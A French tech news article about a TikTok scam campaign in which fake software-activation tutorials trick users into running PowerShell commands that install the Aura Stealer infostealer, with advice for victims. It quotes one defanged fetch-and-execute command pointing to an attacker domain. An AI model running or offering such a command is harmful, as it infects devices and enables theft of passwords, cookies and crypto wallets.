Home Technologie et scienceC’est un piège ! Ils utilisent de faux tutoriels TikTok pour voler des informations

C’est un piège ! Ils utilisent de faux tutoriels TikTok pour voler des informations

by Thomas Caron

Publié le 20 octobre 2025 17h28. Une nouvelle vague de cyberarnaques sévit sur TikTok, incitant les utilisateurs à télécharger des logiciels malveillants déguisés en tutoriels pour obtenir gratuitement des programmes coûteux comme Windows, Netflix ou Photoshop.

  • Des faux tutoriels sur TikTok diffusent des logiciels malveillants et volent des informations personnelles.
  • Les cybercriminels exploitent la popularité de la plateforme pour piéger les utilisateurs avec des promesses d’accès gratuit à des logiciels.
  • Les victimes sont incitées à exécuter des commandes malveillantes via PowerShell, compromettant ainsi leurs appareils.

TikTok est devenu un terrain fertile pour les cybercriminels qui profitent de la soif de solutions rapides et de tutoriels en ligne. Une nouvelle campagne malveillante a été détectée sur la plateforme, où des vidéos trompeuses promettent un accès gratuit à des logiciels et services payants. En réalité, ces vidéos servent de piège pour diffuser des logiciels malveillants et voler des informations sensibles, selon l’expert en sécurité Xavier Mertens du SANS Internet Storm Center (ISC).

Les attaquants misent sur la popularité de TikTok et la courte durée des vidéos pour diffuser leurs arnaques. Ils présentent des explications simplifiées et promettent un accès immédiat à des programmes tels que Windows, Netflix ou Photoshop, sans frais. Cependant, ces tutoriels incitent en réalité les utilisateurs à exécuter des commandes malveillantes qui compromettent la sécurité de leurs appareils.

Image : ISC

Comment fonctionne cette fraude sur TikTok ?

Cette campagne utilise une technique d’ingénierie sociale appelée “Click Fix”, où des solutions apparemment simples sont proposées pour résoudre des problèmes techniques, selon l’analyse de Trend Micro (Trend Micro), détectée dès mai dernier. Les utilisateurs sont guidés pour exécuter des commandes dans PowerShell, l’interface de ligne de commande de Windows, avec la promesse de débloquer des fonctionnalités premium ou d’installer des logiciels complets gratuitement.

Par exemple, une vidéo expliquant comment activer Photoshop peut afficher une commande telle que : iex (irm slmgr[.]gagner/photoshop). Ce code, loin d’activer le logiciel, connecte l’appareil à un serveur distant pour télécharger et exécuter des scripts malveillants.

Que téléchargent ces scripts ?

Selon Bleeping Computer (Bleeping Computer) et l’analyse de Xavier Mertens, le code téléchargé installe deux fichiers exécutables. Le premier est une variante du malware “Aura Stealer”, spécialisé dans le vol d’informations telles que :

  • Les mots de passe enregistrés dans les navigateurs
  • Les cookies d’authentification
  • Les portefeuilles de crypto-monnaie

Le deuxième exécutable a la capacité de compiler du code à la demande, bien que son objectif final reste encore inconnu. Cela suggère que l’attaque pourrait évoluer ou s’adapter en fonction de l’utilisateur ciblé.

Pourquoi les criminels diffusent-ils leurs attaques sur TikTok ?

TikTok est devenu une source courante pour trouver des solutions rapides, notamment des astuces technologiques. Les cybercriminels en sont conscients et utilisent la plateforme comme un canal de distribution efficace. Ces vidéos trompeuses se présentent comme des conseils utiles, ce qui permet aux personnes de tous âges de tomber facilement dans le piège.

« C’est un moyen très efficace d’ingénierie sociale. La confiance dans les créateurs et la simplicité du contenu incitent les gens à agir sans méfiance. »

Xavier Mertens, expert du SANS Internet Storm Center (ISC)

Que faire si vous êtes victime de ces fausses vidéos ?

Bleeping Computer avertit que si un utilisateur suit les instructions de ces vidéos, il doit immédiatement modifier tous ses mots de passe, car ses identifiants pourraient avoir été volés. Cela inclut l’accès à :

  • Sa messagerie électronique
  • Ses réseaux sociaux
  • Ses comptes bancaires et portefeuilles numériques
  • Des plateformes comme Netflix ou Spotify

Il est également recommandé de scanner l’appareil avec des outils de sécurité mis à jour et de se déconnecter des réseaux importants si une activité suspecte est détectée.

You may also like

Leave a Comment